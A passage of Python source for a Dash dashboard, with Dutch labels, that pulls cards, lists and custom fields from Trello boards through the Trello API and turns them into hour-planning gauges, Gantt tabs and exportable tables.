globals = {'config': config, 'credentials': credentials, 'styles': {}}
board_url = ('https://api.trello.com/1/members/me/boards?fields=name&key=' +
    credentials.get('API key') + '&token=' + credentials.get('API token'))
# One Trello call at import time: every board visible to this token.
# (The original wrapped this in json.loads(json.dumps(...)), a no-op
# round-trip for JSON-derived data, which has been dropped.)
boards = requests.get(board_url).json()
globals['boards'] = boards
globals['styles']['maindivs'] = {'box-shadow': '8px 8px 8px grey',
    'background-image': """url('./assets/left.png')""",
    'background-repeat': 'no-repeat',
    'background-position': '0px 0px',
    'margin-top': '1%',
    'margin-bottom': '1%',
    'margin-left': '1%',
    'margin-right': '1%',
    'text-align': 'center',
    'border-radius': '10px'
    }
# The original dict listed 'background' twice (CSS-style fallback), but a
# Python dict literal keeps only the last duplicate key, so the shadowed
# plain-colour entry has been removed.
globals['styles']['tabs'] = {'border-style': 'solid',
    'border-width': '2px',
    'background': 'radial-gradient(circle, rgba(255,255,255,1) 0%, rgba(162,162,162,1) 100%, rgba(255,255,255,1) 100%)',
    'margin-top': '5px',
    'margin-bottom': '5px',
    'margin-right': '5px',
    'margin-left': '5px',
    'border-radius': '6px'
    }
globals['styles']['divgraphs'] = {'background-color': 'rgba(62,182,235,0.1)',
    'margin-top': '1%',
    'margin-bottom': '2%',
    'margin-left': '1%',
    'margin-right': '1%',
    'text-align': 'center',
    'border-radius': '10px'
    }
globals['styles']['dropdowns'] = {'margin-left': '1%', 'margin-right': '2%'}
globals['graphlayouts'] = {'bars': go.Layout(barmode='stack', paper_bgcolor=
    'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)', hovermode='closest')}
#--! Create function to refresh data
def get_data(value):
    """Fetch Trello board `value` and rebuild the module-level `data` dict.

    Side effects: rebinds the globals `config` (the per-board section of
    configuration.txt) and `data` (cards, derived arrays, per-day/per-month
    hour tables, pre-built figures and DataFrames used by the callbacks).
    Performs five Trello REST calls.
    """
    # set data variable to global to use in other functions
    global data
    global config
    with open('./configuration/configuration.txt') as json_file:
        configfile = json.load(json_file)
    config = configfile.get(value)
    # set all url variables
    keys = "key=" + credentials.get('API key') + "&token=" + credentials.get('API token')
    trello_base_url = "https://api.trello.com/1/"
    board_url = trello_base_url + "boards/" + value
    #board_url = trello_base_url+"boards/"+ config.get('Board ID')
    url_cards = board_url + "?cards=all&card_pluginData=true&card_attachments=true&card_customFieldItems=true&filter=all&" + keys
    url_lists = board_url + "/lists?filter=all&" + keys
    url_customfields = board_url + "/customFields?" + keys
    url_labels = board_url + "/labels?" + keys
    url_members = board_url + "/members?" + keys
    # get JSON
    board = json.loads(json.dumps(requests.get(url_cards).json()))
    lists = json.loads(json.dumps(requests.get(url_lists).json()))
    customfields = json.loads(json.dumps(requests.get(url_customfields).json()))
    # NOTE(review): `labels` is fetched but never read below.
    labels = json.loads(json.dumps(requests.get(url_labels).json()))
    members = json.loads(json.dumps(requests.get(url_members).json()))
    cards = board['cards']
    # create function to convert Trello date to datetime (None when absent/invalid)
    def dateCalc(date):
        try:
            newdate = datetime.strptime(date[0:19], '%Y-%m-%dT%H:%M:%S')
            return newdate
        except:
            return None
    # create dict for custom fields, keyed first by field type, then field id
    customfields_dict = {'date': {}, 'list': {}, 'text': {}, 'number': {}, 'checkbox': {}}
    for i in customfields:
        customfields_dict[i['type']] = {}
    for i in customfields:
        customfields_dict[i['type']][i['id']] = {}
    for i in customfields:
        if i['type'] == 'list':
            # Dropdown-style fields also carry an option-id -> text mapping.
            customfields_dict[i['type']][i['id']]['name'] = i['name']
            customfields_dict['list'][i['id']]['options'] = {}
            for j in i['options']:
                customfields_dict['list'][i['id']]['options'][j['id']] = j['value'].get('text')
        else:
            customfields_dict[i['type']][i['id']]['name'] = i['name']
    # collect all chosen lists (every Trello list named in the board config)
    chosenlists = []
    for i in config.get('Not Started'):
        chosenlists.append(i)
    chosenlists.extend(config.get('Blocked'))
    chosenlists.extend(config.get('Doing'))
    chosenlists.extend(config.get('Done'))
    for i in config.get('Epics'):
        chosenlists.append(i)
    for i in config.get('Always continuing'):
        chosenlists.append(i)
    for i in config.get('List with Epics Done'):
        chosenlists.append(i)
    # create function to convert cardid to datetime
    # (the first 8 hex chars of a Trello id are its creation timestamp)
    def idtodate(cardid):
        hex = cardid[0:8]
        timestamp = int(hex, 16)
        timedate = datetime.fromtimestamp(timestamp)
        return timedate
    # create function to get the epic id from the attachment-urls
    # (returns None implicitly when the url has no epicId parameter)
    def get_epicid(url):
        try:
            if 'epicId=' in url:
                start = url.find('epicId=') + 7
                end = url.find('&attachmentId=')
                return url[start:end]
            else:
                pass
        except:
            pass
    # create dict for cards, keyed by card id
    kaarten = {i['id']: {'Naam': i['name'],
        'KaartID': i['id'],
        'ListID': i['idList'],
        'customfields': i['customFieldItems'],
        'Aangemaakt': idtodate(i['id']),
        'labels': [label['name'] for label in i['labels'] if i['labels'] != []],
        'members': [member['fullName'] for member in members if member['id'] in i['idMembers']],
        'Sjabloon': i['isTemplate'],
        'Vervaldatum': dateCalc(i['due']),
        'Gearchiveerd': i['closed'],
        'epicid': [get_epicid(j['url']) for j in i['attachments']],
        'Epic': None,
        'shortUrl': i['shortUrl']
        } for i in cards}
    # remove all attachments except epic-attachments, plus add all members in one string field
    for i, j in kaarten.items():
        while None in j['epicid']:
            j['epicid'].remove(None)
        if j['members'] != []:
            # Join member names into one comma-separated 'Leden' string.
            j['Leden'] = ''
            for k in j['members']:
                if j['Leden'] == '':
                    j['Leden'] += k
                else:
                    j['Leden'] += ', ' + k
        else:
            j['Leden'] = None
        del j['members']
    # add the custom fields to cards-dict: first initialise every field to None...
    if customfields_dict != {}:
        for i, j in customfields_dict.items():
            for k, l in j.items():
                for m, n in kaarten.items():
                    n[l['name']] = None
    # ...then fill in the values each card actually carries
    for i, j in kaarten.items():
        for k in j['customfields']:
            if k['idCustomField'] in customfields_dict['list'].keys():
                j[customfields_dict['list'][k['idCustomField']].get('name')] = customfields_dict['list'][k['idCustomField']]['options'].get(k['idValue'])
            elif k['idCustomField'] in customfields_dict['checkbox'].keys():
                if k['value']['checked'] == 'true':
                    j[customfields_dict['checkbox'][k['idCustomField']].get('name')] = True
                else:
                    j[customfields_dict['checkbox'][k['idCustomField']].get('name')] = False
            elif k['idCustomField'] in customfields_dict['date'].keys():
                j[customfields_dict['date'][k['idCustomField']].get('name')] = dateCalc(k['value'].get('date'))
            else:
                # text / number fields: the value dict's key names the type
                for key in k['value']:
                    j[customfields_dict[key][k['idCustomField']].get('name')] = k['value'].get(key)
    # add epicname: resolve each card's first epic attachment to the epic
    # card's name and category
    epicIdNameCategory = []
    for i, j in kaarten.items():
        epicIdNameCategory.append((i, j['Naam'], j[config.get('Custom Field for Categories')]))
    for i, j in kaarten.items():
        if j['epicid'] == []:
            j['Epic'] = 'Geen epic'
            j['Categorie'] = None
        else:
            for k in epicIdNameCategory:
                if k[0] == j['epicid'][0]:
                    j['Epic'] = k[1]
                    j['Categorie'] = k[2]
        del j['epicid']
    # add listname and status (status is derived from which configured
    # group of lists the card's list belongs to)
    for i, j in kaarten.items():
        for k in lists:
            if j['ListID'] == k['id']: j['Lijst'] = k['name']
        if j['Lijst'] in config.get('Not Started'):
            j['Status'] = 'Niet gestart'
        elif j['Lijst'] in config.get('Doing'):
            j['Status'] = 'Doing'
        elif j['Lijst'] in config.get('Blocked'):
            j['Status'] = 'Blocked'
        elif j['Lijst'] in config.get('Done'):
            j['Status'] = 'Done'
        elif j['Lijst'] in config.get('Always continuing'):
            j['Status'] = 'Doorlopend'
        elif j['Lijst'] in config.get('Epics'):
            j['Status'] = 'Epics Doing'
        elif j['Lijst'] in config.get('List with Epics Done'):
            j['Status'] = 'Epics Done'
        else:
            j['Status'] = 'Archived'
        del j['customfields']
        del j['ListID']
    # archived cards keep status 'Done' if they were done; otherwise 'Archived'
    for i, j in kaarten.items():
        if j['Gearchiveerd'] == True and j['Status'] != 'Done':
            j['Status'] = 'Archived'
    # collect all lists with cards to delete (lists not named in the config)
    liststodelete = []
    for i in lists:
        if i['name'] not in chosenlists:
            liststodelete.append(i['name'])
    # collect all cards to delete (templates and cards on unconfigured lists)
    cardstodelete = []
    for i, j in kaarten.items():
        if j['Sjabloon'] == True:
            cardstodelete.append(i)
        elif j['Lijst'] in liststodelete:
            cardstodelete.append(i)
    # create hours-dict for available hours (one entry per person card on the
    # configured hours list)
    hours = {}
    for i, j in kaarten.items():
        if j['Lijst'] == config.get('List for hours'):
            hours[j['Naam']] = {config['Custom Field for Starting date']: j[config['Custom Field for Starting date']], config['Custom Field for Ending date']: j[config['Custom Field for Ending date']], config['Custom Field with hours']: j[config['Custom Field with hours']]}
    # delete previously collected cards
    for i in cardstodelete:
        if i in kaarten:
            del kaarten[i]
    # create list with all dates (6 months history, 1yr in advance)
    tmpdatesdict = {}
    now = datetime.now().date()
    numdays = 365
    numdayshistory = 183
    for x in range(0, numdays):
        tmpdatesdict[str(now + timedelta(days=x))] = {}
    for x in range(0, numdayshistory):
        tmpdatesdict[str(now - timedelta(days=x))] = {}
    dates = []
    for i in sorted(tmpdatesdict):
        dates.append(i)
    # create some global arrays for later use (dict.fromkeys deduplicates
    # while preserving order)
    arrays = {'epics': list(dict.fromkeys([card['Epic'] for card in kaarten.values()])),
        'xaxis_months': list(dict.fromkeys([i[0:4] + "-" + i[5:7] + "-01" for i in dates])),
        'perioden': list(dict.fromkeys([i[0:4] + i[5:7] for i in dates])),
        'statuses': list(dict.fromkeys([card['Status'] for card in kaarten.values()])),
        config.get('Custom Field for Categories'): list(dict.fromkeys([card[config.get('Custom Field for Categories')] for card in kaarten.values()])),
        config.get('Custom Field for Person'): list(dict.fromkeys([card[config.get('Custom Field for Person')] if card[config.get('Custom Field for Person')] != None else 'Geen ' + config.get('Custom Field for Person') for card in kaarten.values()])),
        }
    # create dict to calculate the hours per day for each card; boards that
    # lack the optional fields (Gebied, Cognosrapport, ...) raise KeyError
    # and fall back to the reduced dict in the except branch
    try:
        urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],
            'Leden': kaart['Leden'],
            'Aangemaakt': kaart['Aangemaakt'],
            'Epic': kaart['Epic'],
            'shortUrl': kaart['shortUrl'],
            config.get('Custom Field for Starting date'): kaart[config.get('Custom Field for Starting date')],
            config.get('Custom Field for Ending date'): kaart[config.get('Custom Field for Ending date')],
            'Gebied': kaart['Gebied'],
            config.get('Custom Field for Person'): kaart[config.get('Custom Field for Person')],
            config.get('Custom Field for Categories'): kaart[config.get('Custom Field for Categories')],
            config.get('Custom Field with hours'): kaart[config.get('Custom Field with hours')],
            'Cognosrapport': kaart['Cognosrapport'],
            'Niet meenemen in telling': kaart['Niet meenemen in telling'],
            'Lijst': kaart['Lijst'],
            'Status': kaart['Status'],
            'urenperdag': {i: 0 for i in dates},
            'urenperperiode': {i: 0 for i in arrays['perioden']}}
            for kaart in kaarten.values()}
    except:
        urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],
            'Leden': kaart['Leden'],
            'Aangemaakt': kaart['Aangemaakt'],
            'Epic': kaart['Epic'],
            'shortUrl': kaart['shortUrl'],
            config.get('Custom Field for Starting date'): kaart[config.get('Custom Field for Starting date')],
            config.get('Custom Field for Ending date'): kaart[config.get('Custom Field for Ending date')],
            config.get('Custom Field for Person'): kaart[config.get('Custom Field for Person')],
            config.get('Custom Field for Categories'): kaart[config.get('Custom Field for Categories')],
            config.get('Custom Field with hours'): kaart[config.get('Custom Field with hours')],
            'Lijst': kaart['Lijst'],
            'Status': kaart['Status'],
            'urenperdag': {i: 0 for i in dates},
            'urenperperiode': {i: 0 for i in arrays['perioden']}}
            for kaart in kaarten.values()}
    # do the same for available hours
    beschikbareuren = {key: {'urenperdag': {i: 0 for i in dates},
        'urenperperiode': {i: 0 for i in arrays['perioden']}}
        for key in hours.keys()}
    # spread each card's total hours evenly over the days between its start
    # and end date
    for i in dates:
        datekey = datetime.strptime(i, '%Y-%m-%d').date()
        for k, l in kaarten.items():
            if l['Niet meenemen in telling'] != True:
                try:
                    if l[config.get('Custom Field for Starting date')].date() < datekey <= l[config.get('Custom Field for Ending date')].date():
                        delta = l[config.get('Custom Field for Ending date')] - l[config.get('Custom Field for Starting date')]
                        hoursperday = int(l[config.get('Custom Field with hours')]) / int(delta.days)
                        urenperdagperkaart[l['Naam']]['urenperdag'][i] = hoursperday
                except:
                    # Cards without both dates/hours are skipped.
                    pass
        for k, l in hours.items():
            try:
                if l[config.get('Custom Field for Starting date')].date() < datekey <= l[config.get('Custom Field for Ending date')].date():
                    # NOTE: int(30.4) truncates to 30 (~average days/month).
                    hoursperday = int(l[config.get('Custom Field with hours')]) / int(30.4)
                    beschikbareuren[k]['urenperdag'][i] = hoursperday
            except:
                pass
    # calculate the hours per month with the hours per day for each card
    for i, j in urenperdagperkaart.items():
        for k, l in j['urenperdag'].items():
            for m in j['urenperperiode'].keys():
                if m == k[0:4] + k[5:7]:
                    j['urenperperiode'][m] += l
    # do the same for available hours
    for i, j in beschikbareuren.items():
        for k, l in j['urenperdag'].items():
            for m in j['urenperperiode'].keys():
                if m == k[0:4] + k[5:7]:
                    j['urenperperiode'][m] += l
    # create data for a dataframe with the hours per month (periods become
    # columns; per-day detail is dropped)
    dfurenpermaand = copy.deepcopy(urenperdagperkaart)
    for i, j in dfurenpermaand.items():
        try:
            j['Geplande uren'] = int(j['Geplande uren'])
        except:
            j['Geplande uren'] = 0
        for k, l in j['urenperperiode'].items():
            j[k] = round(l, 2)
        del j['urenperperiode']
    # create a bar chart with all cards with no begin and end date
    # (estimated but unscheduled work, grouped per Trello list)
    bars = []
    labelsnietingepland = []
    for j in kaarten.values():
        if j[config.get('Custom Field for Starting date')] == None and j[config.get('Custom Field for Ending date')] == None and j[config.get('Custom Field with hours')] != None and j['Status'] == 'Niet gestart':
            labelsnietingepland.append(j['Lijst'])
    labelsnietingepland = list(dict.fromkeys(labelsnietingepland))
    for i, j in kaarten.items():
        if j[config.get('Custom Field for Starting date')] == None and j[config.get('Custom Field for Ending date')] == None and j[config.get('Custom Field with hours')] != None and j['Status'] == 'Niet gestart':
            tmp = []
            for label in labelsnietingepland:
                if j['Lijst'] == label:
                    tmp.append(int(j['Geplande uren']))
                else:
                    tmp.append(0)
            bars.append(dict(x=labelsnietingepland,
                y=tmp,
                name=j['Naam'],
                type='bar',
                opacity='0.6'))
    # create a bar chart with all cards with no begin and end date per epic
    epicbars = []
    tmpepicsforbarchart = {epic: 0 for epic in [name['Naam'] for name in kaarten.values() if name['Status'] in ['Epics Doing', 'Epics Done']]}
    tmpepicsforbarchart['Geen epic'] = 0
    for i, j in kaarten.items():
        if j[config.get('Custom Field for Starting date')] == None and j[config.get('Custom Field for Ending date')] == None and j[config.get('Custom Field with hours')] != None and j['Status'] == 'Niet gestart':
            tmpepicsforbarchart[j['Epic']] += int(j[config.get('Custom Field with hours')])
    # drop epics with zero unscheduled hours
    epicsforbarchart = {k: v for k, v in tmpepicsforbarchart.items() if v != 0}
    epicbars.append(dict(x=[key for key in epicsforbarchart.keys()],
        y=[value for value in epicsforbarchart.values()],
        type='bar',
        text=[value for value in epicsforbarchart.values()],
        textposition='outside',
        opacity='0.6'))
    # create figure for gauge (planned vs available hours, three months ahead)
    thismonth = datetime.strftime(datetime.now(), '%Y%m')
    nextmonth = (datetime.now() + relativedelta(months=1)).strftime('%Y%m')
    twomonths = (datetime.now() + relativedelta(months=2)).strftime('%Y%m')
    # (period, localised month name) pairs for the tactical-planning dropdown
    arrays['threemonths'] = [(thismonth, datetime.strptime(thismonth, '%Y%m').strftime('%B')), (nextmonth, datetime.strptime(nextmonth, '%Y%m').strftime('%B')), (twomonths, datetime.strptime(twomonths, '%Y%m').strftime('%B'))]
    gaugegeplandthismonth = round(sum([value for card in urenperdagperkaart.values() for keys, value in card['urenperperiode'].items() if keys == thismonth]))
    gaugegeplandnextmonth = round(sum([value for card in urenperdagperkaart.values() for keys, value in card['urenperperiode'].items() if keys == nextmonth]))
    gaugegeplandtwomonths = round(sum([value for card in urenperdagperkaart.values() for keys, value in card['urenperperiode'].items() if keys == twomonths]))
    deltathismonth = round(sum([value for card in beschikbareuren.values() for keys, value in card['urenperperiode'].items() if keys == thismonth]))
    deltanextmonth = round(sum([value for card in beschikbareuren.values() for keys, value in card['urenperperiode'].items() if keys == nextmonth]))
    deltatwomonths = round(sum([value for card in beschikbareuren.values() for keys, value in card['urenperperiode'].items() if keys == twomonths]))
    # gauge axis range: whichever of planned/available is larger, plus margin
    if deltathismonth > gaugegeplandthismonth:
        gaugerangethismonth = deltathismonth + 20
    else:
        gaugerangethismonth = gaugegeplandthismonth + 20
    if deltanextmonth > gaugegeplandnextmonth:
        gaugerangenextmonth = deltanextmonth + 20
    else:
        gaugerangenextmonth = gaugegeplandnextmonth + 20
    if deltatwomonths > gaugegeplandtwomonths:
        gaugerangetwomonths = deltatwomonths + 20
    else:
        gaugerangetwomonths = gaugegeplandtwomonths + 20
    # colour bands: green -> red as planned hours approach/exceed available
    gaugestepsthismonth = {'axis': {'range': [None, gaugerangethismonth]},
        'bar': {'color': '#3eb6eb'},
        'steps': [
            {'range': [0, deltathismonth * 0.5], 'color': '#3deb34'},
            {'range': [deltathismonth * 0.5, deltathismonth * 0.75], 'color': '#b4eb34'},
            {'range': [deltathismonth * 0.75, deltathismonth * 0.9], 'color': '#ebb434'},
            {'range': [deltathismonth * 0.9, deltathismonth], 'color': '#eb6e34'},
            {'range': [deltathismonth, gaugerangethismonth], 'color': '#eb3434'},
        ],
        'threshold': {'line': {'color': "#5c0000", 'width': 4}, 'thickness': 0.75, 'value': deltathismonth}
        }
    gaugestepsnextmonth = {'axis': {'range': [None, gaugerangenextmonth]},
        'bar': {'color': '#3eb6eb'},
        'steps': [
            {'range': [0, deltanextmonth * 0.5], 'color': '#3deb34'},
            {'range': [deltanextmonth * 0.5, deltanextmonth * 0.75], 'color': '#b4eb34'},
            {'range': [deltanextmonth * 0.75, deltanextmonth * 0.9], 'color': '#ebb434'},
            {'range': [deltanextmonth * 0.9, deltanextmonth], 'color': '#eb6e34'},
            {'range': [deltanextmonth, gaugerangenextmonth], 'color': '#eb3434'},
        ],
        'threshold': {'line': {'color': "#5c0000", 'width': 4}, 'thickness': 0.75, 'value': deltanextmonth}
        }
    gaugestepstwomonths = {'axis': {'range': [None, gaugerangetwomonths]},
        'bar': {'color': '#3eb6eb'},
        'steps': [
            {'range': [0, deltatwomonths * 0.5], 'color': '#3deb34'},
            {'range': [deltatwomonths * 0.5, deltatwomonths * 0.75], 'color': '#b4eb34'},
            {'range': [deltatwomonths * 0.75, deltatwomonths * 0.9], 'color': '#ebb434'},
            {'range': [deltatwomonths * 0.9, deltatwomonths], 'color': '#eb6e34'},
            {'range': [deltatwomonths, gaugerangetwomonths], 'color': '#eb3434'},
        ],
        'threshold': {'line': {'color': "#5c0000", 'width': 4}, 'thickness': 0.75, 'value': deltatwomonths}
        }
    gaugefig = go.Figure()
    gaugefig.add_trace(go.Indicator(
        domain={'x': [0, 0.3], 'y': [0, 1]},
        value=gaugegeplandthismonth,
        mode="gauge+number+delta",
        title={'text': "Totale uren voor " + datetime.strptime(thismonth, '%Y%m').strftime('%B')},
        delta={'reference': deltathismonth},
        gauge=gaugestepsthismonth
    ))
    gaugefig.add_trace(go.Indicator(
        domain={'x': [0.35, 0.65], 'y': [0, 1]},
        value=gaugegeplandnextmonth,
        mode="gauge+number+delta",
        title={'text': "Totale uren voor " + datetime.strptime(nextmonth, '%Y%m').strftime('%B')},
        delta={'reference': deltanextmonth},
        gauge=gaugestepsnextmonth
    ))
    gaugefig.add_trace(go.Indicator(
        domain={'x': [0.7, 1], 'y': [0, 1]},
        value=gaugegeplandtwomonths,
        mode="gauge+number+delta",
        title={'text': "Totale uren voor " + datetime.strptime(twomonths, '%Y%m').strftime('%B')},
        delta={'reference': deltatwomonths},
        gauge=gaugestepstwomonths
    ))
    gaugefig.update_layout(paper_bgcolor='rgba(0,0,0,0)',
        plot_bgcolor='rgba(0,0,0,0)',)
    graphdata = {'nietingepland': bars, 'nietingeplandepics': epicbars, 'gaugefig': gaugefig}
    # derive DataTable column types from the first card's field values
    # (NOTE: `value` here shadows the function parameter of the same name)
    columntypes = {}
    for key, value in kaarten[next(iter(kaarten))].items():
        if 'datum' in key or key == 'Aangemaakt':
            columntypes[key] = 'datetime'
        elif type(value) == int:
            columntypes[key] = 'numeric'
        # NOTE(review): `type(value in [str, bool])` evaluates type() of a
        # bool, which is always truthy, so every remaining column becomes
        # 'text'. Likely intended `type(value) in [str, bool]` — but fixing
        # it would leave list/None-valued columns untyped, so flagged only.
        elif type(value in [str, bool]):
            columntypes[key] = 'text'
    columntypesurenpermaand = dict(columntypes)
    columntypesurenpermaand.update({i: 'text' for i in arrays['perioden']})
    data = {'kaarten': kaarten,
        'arrays': arrays,
        'urenperdagperkaart': urenperdagperkaart,
        'beschikbareuren': beschikbareuren,
        'graphdata': graphdata,
        'dfs': {'kaartendf': pd.DataFrame(data=kaarten).T,
            'columntypes': columntypes,
            'urenpermaand': pd.DataFrame(data=dfurenpermaand).T,
            'columntypesurenpermaand': columntypesurenpermaand
            }
        }
#--! Create layout function. Only create a simple layout with a few components. The rest will be loaded using callbacks.
def make_layout():
    """Build the top-level Dash layout.

    Only a minimal skeleton is created here (banner, board dropdown, refresh
    button and an empty target div); the tabs and graphs are injected into the
    'test' div by the ``create_maindiv`` callback. Dash re-evaluates this
    function on every page load because ``app.layout`` is set to the function
    itself.
    """
    # NOTE: the original style dict contained a duplicate 'background' key
    # (solid colour followed by a gradient). In a Python dict literal only the
    # last value survives, so the dead solid-colour entry has been removed;
    # rendered output is unchanged.
    banner_style = {
        'font-style': 'italic',
        'font-weight': 'bold',
        'border': '10px',
        'box-shadow': '8px 8px 8px grey',
        'background': 'linear-gradient(133deg, rgba(62,182,235,1) 0%, rgba(243,253,255,1) 76%, rgba(243,253,255,0) 100%)',
        'margin-top': '1%',
        'margin-bottom': '1%',
        'margin-right': '1%',
        'margin-left': '1%',
        'border-radius': '10px',
        'text-align': 'center'
    }
    banner = html.Div(
        style=banner_style,
        className='Banner',
        children=[
            html.Div(
                style={'display': 'inline-block', 'width': '80%'},
                children=[
                    html.H1('Trello borden USD'),
                ]
            ),
            html.Div(
                style={'display': 'inline-block', 'margin-right': '1px'},
                children=[
                    html.Img(src=app.get_asset_url('logonop.png'), style={'width': '150px','margin-right': '0px'})
                ]
            )
        ]
    )
    return html.Div(
        className='First Div',
        children=[
            banner,
            html.H5('Kies hieronder een bord', style={'text-align': 'center'}),
            dcc.Dropdown(
                id='dropdown_boards',
                options=[{'label': i['name'], 'value': i['id']} for i in boards],
                value = boards[0]['id'],
            ),
            html.Button('Data verversen', id='refreshdatabtn', n_clicks=0),
            # Placeholder that create_maindiv fills with the tabbed main view.
            html.Div(
                id='test'
            )
        ]
    )#/firstdiv
#--! Get CSS files and scripts and set App (including layout)
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
# Dutch locale for plotly (month names, number formats in the graphs).
external_scripts = ['https://cdn.plot.ly/plotly-locale-nl-latest.js']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets,external_scripts=external_scripts, url_base_pathname='/dash/')
# Assigning the function (not its result) makes Dash rebuild the layout on every page load.
app.layout = make_layout
#--! Set Dash to suppress callback exceptions, because some callbacks can only be made when the first callback in the main layout has been made.
app.config['suppress_callback_exceptions'] = True
#--! Define app callbacks
#---! dropdown_boards
# This function should be changed when more boards are added. For now, only Werkvoorraad is compatible.
@app.callback(Output('test', 'children'),
             [Input('dropdown_boards', 'value'),
             Input('refreshdatabtn', 'n_clicks')]
)
def create_maindiv(value, n_clicks):
    """Reload the Trello data for board *value* and build the tabbed main view.

    Triggered by both the board dropdown and the refresh button. The returned
    div (refresh timestamp + four tabs) is injected into the empty 'test'
    placeholder created by ``make_layout``.
    """
    # first retrieve all data
    get_data(value)
    import os
    # Windows' strftime does not support the '%-d' (no-padding) flag, hence the platform check.
    if os.name=='nt':
        daterefreshed = datetime.strftime(datetime.now(), '%A %d %b, %H:%M')
    else:
        daterefreshed = datetime.strftime(datetime.now(),'%A %-d %B, %H:%M')
    # Return all other divs
    return html.Div(
        className='',
        children=[
            # Show date of refresh
            dcc.Markdown('''**Laatst ververst: **''' + daterefreshed),
            # Create tabs
            dcc.Tabs(
                className='Tabs',
                children=[
                    # Create first tab
                    # --- Tab 1: Gantt charts per epic / per person ---
                    dcc.Tab(
                        label='Gantt charts',
                        style=globals['styles']['tabs'],
                        children=[
                            html.Div(
                                className='tab2_div1',
                                style=globals['styles']['maindivs'],
                                children=[
                                    html.H3('Uitleg'),
                                    html.Div(
                                        style=globals['styles']['divgraphs'],
                                        children=[
                                            dcc.Markdown('''In dit tabblad worden de kaarten in GANTT charts weergegeven. Kies in de dropdown voor welke epic de kaarten moeten worden weergegeven.'''),
                                        ]
                                    ),
                                ]
                            ),
                            html.Div(
                                className='tab2_div2',
                                style=globals['styles']['maindivs'],
                                children=[
                                    html.H4('Gantt per epic'),
                                    dcc.Dropdown(
                                        style = globals['styles']['dropdowns'],
                                        id='dropdownganttepics',
                                        options=[{'label':name, 'value':name} for name in data['arrays']['epics']],
                                        value = [next(iter(data['arrays']['epics']))]
                                    ),
                                    html.Div(
                                        style=globals['styles']['divgraphs'],
                                        children=[
                                            # Figure filled by the update_ganttepics callback.
                                            dcc.Graph(id='ganttepics'),
                                        ]
                                    ),
                                ]
                            ),
                            html.Div(
                                className='tab2_div3',
                                style=globals['styles']['maindivs'],
                                children=[
                                    html.H4('Gantt per persoon'),
                                    dcc.Dropdown(
                                        style = globals['styles']['dropdowns'],
                                        id='dropdownganttpersoon',
                                        options=[{'label':name, 'value':name} for name in data['arrays'][config.get('Custom Field for Person')]],
                                    ),
                                    dcc.Dropdown(
                                        style = globals['styles']['dropdowns'],
                                        id='dropdownganttpersoonstatus',
                                        options=[{'label':name, 'value':name} for name in data['arrays']['statuses']],
                                        value = data['arrays']['statuses'],
                                        multi=True,
                                    ),
                                    html.Div(
                                        style=globals['styles']['divgraphs'],
                                        children=[
                                            # Figure filled by the update_ganttpersoon callback.
                                            dcc.Graph(id='ganttpersoon'),
                                        ]
                                    ),
                                ]
                            ),
                        ]
                    ),
                    # --- Tab 2: Excel exports of the raw card data ---
                    dcc.Tab(
                        label='Data export',
                        style=globals['styles']['tabs'],
                        children=[
                            html.Div(
                                className='tab3_div1',
                                style=globals['styles']['maindivs'],
                                children=[
                                    html.H3('Uitleg'),
                                    html.Div(
                                        style=globals['styles']['divgraphs'],
                                        children=[
                                            dcc.Markdown('''Hieronder kan de data worden geëxporteerd. Via de buttons 'Export' downloadt je een excelbestand.'''),
                                            dcc.Markdown('''In het dashboard kun je met de knop 'Toggle columns' ook velden zichtbaar maken, om van tevoren te filteren. Kies dan de velden, filter daarna en klik op 'Export'.'''),
                                        ]
                                    ),
                                ]
                            ),
                            html.Div(
                                className='tab3_div2',
                                style=globals['styles']['maindivs'],
                                children=[
                                    html.H4('Platte dump'),
                                    dcc.Markdown('Deze tabel laat de platte data zien, zoals in Trello gevuld.'),
                                    dash_table.DataTable(
                                        id='table_plattedump',
                                        columns=[{'name': i, 'id': i, 'type': data['dfs']['columntypes'].get(i), 'hideable': True} for i in data['dfs']['kaartendf'].columns if i in data['dfs']['columntypes'].keys()],
                                        data=data['dfs']['kaartendf'].to_dict('records'),
                                        # All columns start hidden; the user toggles them on before exporting.
                                        hidden_columns=[i for i in data['dfs']['columntypes']],
                                        export_format='xlsx',
                                        export_headers='display',
                                        export_columns='all',
                                        filter_action="native",
                                        sort_action="native",
                                        sort_mode="multi",
                                        style_table={'overflowX': 'scroll'},
                                        style_header={'backgroundColor': 'rgba(62,182,235,0.6)','color': 'black', 'fontWeight': 'bold', 'fontFamily': 'Arial'},
                                        style_cell = {'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black','text-align': 'left', 'fontFamily': 'Arial', 'height': 'auto'},
                                    )
                                ]
                            ),
                            html.Div(
                                className='tab3_div3',
                                style=globals['styles']['maindivs'],
                                children=[
                                    html.H4('Uren per maand'),
                                    dcc.Markdown('Hieronder kan een export gemaakt worden van de uren zoals ze per maand zijn ingepland.'),
                                    dcc.Markdown('Ook hierin kan gefilterd worden. filter bijvoorbeeld in de maand naar keuze op >0 om alle kaarten die geen ingeplande uren hebben niet te tonen.'),
                                    dash_table.DataTable(
                                        id='table_urenpermaand',
                                        columns=[{'name': i, 'id': i, 'type': data['dfs']['columntypesurenpermaand'].get(i), 'hideable': True} for i in data['dfs']['urenpermaand'].columns if i in data['dfs']['columntypesurenpermaand'].keys()],
                                        data=data['dfs']['urenpermaand'].to_dict('records'),
                                        hidden_columns=[i for i in data['dfs']['columntypesurenpermaand']],
                                        export_format='xlsx',
                                        export_headers='display',
                                        export_columns='all',
                                        filter_action="native",
                                        sort_action="native",
                                        sort_mode="multi",
                                        style_header={'backgroundColor': 'rgba(62,182,235,0.6)','color': 'black', 'fontWeight': 'bold', 'fontFamily': 'Arial'},
                                        style_cell = {'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black','text-align': 'left', 'fontFamily': 'Arial'},
                                    )
                                ]
                            ),
                        ]
                    ),
                    # --- Tab 3: long-term planning per category ---
                    dcc.Tab(
                        label='Langetermijnplanning',
                        style=globals['styles']['tabs'],
                        children=[
                            html.Div(
                                className='maindivs',
                                style=globals['styles']['maindivs'],
                                children=[
                                    html.H3('Uitleg'),
                                    html.Div(
                                        style=globals['styles']['divgraphs'],
                                        children=[
                                            dcc.Markdown('''In dit tabblad wordt een langetermijnplanning getoond.'''),
                                            dcc.Markdown('''De focus hierbij ligt vooral op de categorieen.'''),
                                        ]
                                    ),
